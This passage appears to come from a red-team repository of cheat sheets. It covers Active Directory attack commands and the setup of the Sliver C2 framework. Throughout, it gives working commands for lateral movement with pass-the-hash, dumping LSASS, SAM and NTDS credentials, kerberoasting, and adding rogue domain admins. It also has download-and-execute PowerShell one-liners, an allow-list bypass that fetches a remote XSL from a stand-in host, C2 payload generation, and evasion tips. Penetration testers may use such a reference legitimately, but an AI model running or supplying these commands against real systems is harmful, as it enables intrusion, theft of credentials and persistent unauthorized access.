Invoke-BloodHound"` 1179 | 1180 | ### Run using Sharppick - AMSI bypass 1181 | 1182 | SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound" 1183 | 1184 | `SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"` 1185 | 1186 | ### Goddi (fast dump all domain info) 1187 | 1188 | `.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe` 1189 | 1190 | ### ADRecon (More detailed - Good for AD Auditing) 1191 | 1192 | https://github.com/sense-of-security/ADRecon 1193 | 1194 | ### Share and file finder 1195 | `Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | 1196 | Out-File -Encoding Ascii interesting-shares.txt` 1197 | 1198 | `Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 1199 | 20 -OutFile juicy_files.csv` 1200 | 1201 | ### Eyewitness 1202 | docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com 1203 | 1204 | ### Windows priv esc 1205 | 1206 | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 1207 | 1208 | ## Compromise and Lateral Movement 1209 | 1210 | ### Crackmapexec 1211 | 1212 | `crackmapexec smb 172.16.110.0/24` 1213 | 1214 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'` 1215 | 1216 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol` 1217 | 1218 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz` 1219 | 1220 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam` 1221 | 1222 | `crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa` 1223 | 1224 | ### Winexe to boxes (not opsec safe) - service is run. No cleanup. 1225 | 1226 | `pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%blahpassword cmd` 1227 | 1228 | `pth-winexe //10.0.0.1 -U DOMAIN/zdefense/blahuser%hash cmd` 1229 | 1230 | ### Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service. 1231 | 1232 | `psexec.py user@IP` 1233 | 1234 | `psexec.py user@IP -hashes ntlm:hash` 1235 | 1236 | ### Impacket wmiexec.py (opsec safe - unless WMI logging is enabled) 1237 | 1238 | `wmiexec.py domain/user@IP` 1239 | 1240 | `wmiexec.py domain/user@IP -hashes ntlm:hash` 1241 | 1242 | ### Impacket smbclient (probably opsec safe as its just using SMB) 1243 | 1244 | `python smbclient.py domain/blahuser@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:blah` 1245 | 1246 | ## RDP Pass the Hash 1247 | Using mimikatz: 1248 | 1249 | `privilege::debug` 1250 | `sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"` 1251 | 1252 | If disabled: 1253 | 1254 | `sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe` 1255 | `Enter-PSSession -Computer ` 1256 | `New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force` 1257 | 1258 | ## Invoke the hash 1259 | 1260 | `Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah` 1261 | 1262 | ## Password dumping 1263 | 1264 | ### From Live Kali on a workstation 1265 | `samdump2 SYSTEM SAM > hashes.txt` 1266 | 1267 | ### Local 1268 | 1269 | `C:\> reg.exe save hklm\sam c:\temp\sam.save` 1270 | 1271 | `C:\> reg.exe save hklm\security c:\temp\security.save` 1272 | 1273 | `C:\> reg.exe save hklm\system c:\temp\system.save` 1274 | 1275 | `secretsdump.py -sam sam.save -security security.save -system system.save LOCAL` 1276 | 1277 | `pwdump system sam` 1278 | 1279 | ### In Memory 1280 | `C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1` 1281 | 1282 | `C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit` 1283 | 1284 | `C:\>mini.exe` 1285 | 1286 | https://github.com/b4rtik/ATPMiniDump 1287 | 1288 | ### From box 1289 | 1290 | `mimikatz # privilege::debug` 1291 | `mimikatz # sekurlsa::logonPasswords full` 1292 | 1293 | ### Remote 1294 | 1295 | `impacket-secretsdump Administrator@ip` 1296 | `impacket-secretsdump Administrator@ip -hashes ntlm:hash` 1297 | 1298 | ### Domain 1299 | 1300 | To find where NTDS is run the below: 1301 | 1302 | `reg.exe query hklm\system\currentcontrolset\services\ntds\parameters` 1303 | 1304 | ### vssadmin 1305 | 1306 | `C:\vssadmin list shadows` 1307 | 1308 | `C:\vssadmin create shadow /for=C:` 1309 | 1310 | `copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .` 1311 | 1312 | `copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .` 1313 | 1314 | `copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .` 1315 | 1316 | `secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm` 1317 | 1318 | remove machine accounts 1319 | 1320 | `grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt` 1321 | 1322 | only passwords for pipal 1323 | 1324 | `cut -f 3 -d ':' cracked_with_users_enabled.txt` 1325 | 1326 | `vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}` 1327 | 1328 | godumpsecrets for faster 1329 | 1330 | ### ntdsutil 1331 | 1332 | ``` 1333 | C:\>ntdsutil 1334 | ntdsutil: activate instance ntds 1335 | ntdsutil: ifm 1336 | ifm: create full c:\pentest 1337 | ifm: quit 1338 | ntdsutil: quit 1339 | ``` 1340 | 1341 | `ntdsutil` 1342 | 1343 | `ntdsutil: snapshot` 1344 | 1345 | `ntdsutil: list all` 1346 | 1347 | `ntdsutil: create` 1348 | 1349 | `snapshot: mount 1` 1350 | 1351 | Cleanup snapshots: 1352 | 1353 | `snapshot: list all` 1354 | 1355 | `snapshot: unmount 1` 1356 | 1357 | `snapshot: list all` 1358 | 1359 | `snapshot: delete 1` 1360 | 1361 | ## Post Compromise (Not opsec safe) 1362 | Add user to local admin and domain admin 1363 | 1364 | ### Add Domain Admin 1365 | `net user username password /ADD /DOMAIN` 1366 | 1367 | `net group "Domain Admins" username /ADD /DOMAIN` 1368 | 1369 | ### Add Local Admin 1370 | `net user username password /ADD` 1371 | 1372 | `net localgroup Administrators username /ADD` 1373 | 1374 | 1375 | ### Tasklist scraper to find logged in admins 1376 | 1377 | If powershell not enabled or unable to run BloodHound this script will find admins. 1378 | 1379 | `#!/bin/sh` 1380 | 1381 | `for ip in $(cat ip.txt);do` 1382 | 1383 | `pth-winexe -U Admin%hash //$ip "ipconfig"` 1384 | 1385 | `pth-winexe -U Admin%hash //$ip "tasklist /v"` 1386 | 1387 | `done` 1388 | 1389 | ### Kerberoasting 1390 | 1391 | `Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat` 1392 | 1393 | https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1 1394 | 1395 | Invoke-AutoKerberoast 1396 | 1397 | `python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast` 1398 | 1399 | `IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast` 1400 | 1401 | ### Hashcat Alienware - kerbtgt hash cracking 1402 | 1403 | `sudo apt-get install nvidia-367` 1404 | 1405 | `sudo nvidia-smi` 1406 | 1407 | `reboot` 1408 | 1409 | `sudo hashcat -I` 1410 | 1411 | `hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst` 1412 | 1413 | ### LAPS - GetLAPSPasswords 1414 | 1415 | https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1 1416 | 1417 | ## Priv Esc 1418 | ### Powerup 1419 | 1420 | `IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks` 1421 | 1422 | ## File Transfer 1423 | 1424 | ### SMB Server in Kali 1425 | 1426 | `python smbserver.py test /root/tools` 1427 | 1428 | ### Python Web Server 1429 | 1430 | `python -m SimpleHTTPServer ` 1431 | 1432 | ## Domain Fronting 1433 | 1434 | https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ 1435 | https://signal.org/blog/doodles-stickers-censorship/ 1436 | https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/ 1437 | https://trac.torproject.org/projects/tor/wiki/doc/meek 1438 | http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/ 1439 | 1440 | ## AWL bypasses 1441 | 1442 | ### Powershell without powershell.exe 1443 | 1444 | `SharpPick.exe -d "http://zdefense/blah.ps1"` 1445 | 1446 | ### Squiblytwo 1447 | 1448 | `wmic.exe os get /format:"http://zdefense/foo.xsl"` 1449 | 1450 | ### Sharpshooter 1451 | 1452 | https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/ 1453 | 1454 | `python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://ZDefense/foo.xsl` 1455 | 1456 | ### cypher queries 1457 | 1458 | user to which box the user has localadmin 1459 | 1460 | `MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)` 1461 | 1462 | List of DAs 1463 | `Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@ZDefense" return u.displayname` 1464 | 1465 | https://downloads.skullsecurity.org/dnscat2/ 1466 | https://github.com/lukebaggett/dnscat2-powershell 1467 | $ dnscat –host 1468 | -------------------------------------------------------------------------------- /SliverC2/README.md: -------------------------------------------------------------------------------- 1 | # Sliver C2 Cheat Sheet 2 | 3 | # TO DO - Work in Progress 4 | 5 | ## Setup 6 | 7 | Sliver client and server can both be downloaded from public [GitHub releases](https://github.com/BishopFox/sliver/releases/), or it can manually be compiled. 8 | 9 | ### Sliver Server 10 | 11 | The Sliver server can be installed running in "Daemon mode" using the [Linux Install Script](https://github.com/BishopFox/sliver/wiki/Linux-Install-Script). Use a quick Bash script below to help with setting up requirements and installing/running the Sliver server: 12 | ``` 13 | #!/bin/bash 14 | 15 | if [[ $(/usr/bin/id -u) -ne 0 ]]; then 16 | echo "Not running as root" 17 | exit 18 | fi 19 | 20 | # Stop apache if its started automatically 21 | service apache2 stop 22 | 23 | cd /tmp 24 | apt update -y 25 | apt update --fix-missing -y 26 | apt install git mingw-w64 net-tools -y 27 | 28 | # Sliver install in Daemon mode 29 | curl https://sliver.sh/install|sudo bash 30 | systemctl status sliver --no-pager 31 | echo Sliver running in Daemon mode! 32 | 33 | # Create new user config 34 | cd /root 35 | IP=`curl https://ifconfig.me/ip` 36 | ./sliver-server operator --name sliver-user --lhost "$IP" --save /root/sliver-user.cfg 37 | exit 38 | ``` 39 | 40 | The Sliver service can be verified that it's running with the command `systemctl status sliver`.
41 | Download the output config file `/root/sliver-user.cfg` from the above Bash script to import on your Sliver client. 42 | 43 | If you want to automate Sliver C2 setup and deployment in DigitalOcean, check out my [GitHub repo](https://github.com/wsummerhill/Automation-Scripts/tree/main/Sliver-C2-deployment_DigitalOcean). 44 | 45 | ### Sliver Client 46 | 47 | Use the Sliver client to import your `sliver-user.cfg` config file and use it to connect to the Sliver server: 48 | ``` 49 | ./sliver-client_OS import ./sliver-user.cfg # Import config 50 | ./sliver-client_OS # Connect to Sliver server 51 | 52 | Connecting to :31337 ... 53 | [*] Loaded 69 extension(s) from disk 54 | 55 | ███████╗██╗ ██╗██╗ ██╗███████╗██████╗ 56 | ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗ 57 | ███████╗██║ ██║██║ ██║█████╗ ██████╔╝ 58 | ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ 59 | ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║ 60 | ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ 61 | 62 | All hackers gain undying 63 | [*] Server v1.5.41 - f2a3915c79b31ab31c0c2f0428bbd53d9e93c54b 64 | [*] Welcome to the sliver shell, please type 'help' for options 65 | 66 | sliver > help 67 | ... 68 | ``` 69 | 70 | --- 71 | ## Usage - Useful CLI Commands Cheat Sheet 72 | ``` 73 | # Starting HTTP/S Listeners 74 | http -> Start HTTP listener 75 | https -> Start HTTPS listener 76 | https -c cert.pen -k key_decrypted.pem -d domain.com -p -> Start HTTPS listener using a cert/key which only accepts connections from a specific domain (i.e. redirector) 77 | 78 | # Managing or stopping listeners 79 | jobs -> View active jobs (aka listeners/stages) 80 | jobs -k -> Kill listener job 81 | 82 | # Beacon/Session management 83 | beacons -> List active beacons 84 | sessions -> List active sessions 85 | beacons rm -> Select a beacon to remove 86 | use -> Interact with a Beacon/Session 87 | background -> Background an active Beacon/Session 88 | 89 | # Payloads 90 | implants -> List all created payload builds 91 | implants rm -> Remove an implant build 92 | generate ... -> Create Session payload 93 | generate beacon ... -> Create Beacon payload 94 | 95 | # Armory (BOFs) 96 | armory -> List all available packages/bundles in armory 97 | armory search -> Search for specific aromory package/bundle 98 | armory install -> Install a new armory package/bundle 99 | armory update -> Update installed packages 100 | 101 | # Miscellaneous 102 | hosts -> List all hosts that have had beacons or sessions 103 | update -> Check for Sliver updates 104 | clear -> Clear the screen 105 | loot -> Show captured loot 106 | reaction ... -> Create automatic command upon specific events like a new session 107 | ``` 108 | 109 | --- 110 | ## Listeners - HTTP(S) 111 | 112 | TO DO 113 | 114 | --- 115 | ## Redirectors - HTTP(S) 116 | 117 | TO DO 118 | 119 | --- 120 | ## Payloads 121 | ### Beacon Payloads 122 | 123 | TO DO 124 | 125 | ### Session Payloads 126 | 127 | TO DO 128 | 129 | ### Debugging Payloads for testing 130 | 131 | Sliver can easily create debugging payloads for testing execution or viewing C2 traffic sent by the payload or server. Use the `generate --debug` 132 | parameter when generating new payloads which will show the debug output in the CLI console. 133 | 134 | --- 135 | ## OPSEC Tips 136 | 137 | - Best practices to modify the default HTTP(S) C2 profile at the local path `/root/.sliver/configs/http-c2.json` 138 | - Always use Sliver Armory wherever you can to execute commands within the current process instead of using commands or tools that spawn new or child processes 139 | --------------------------------------------------------------------------------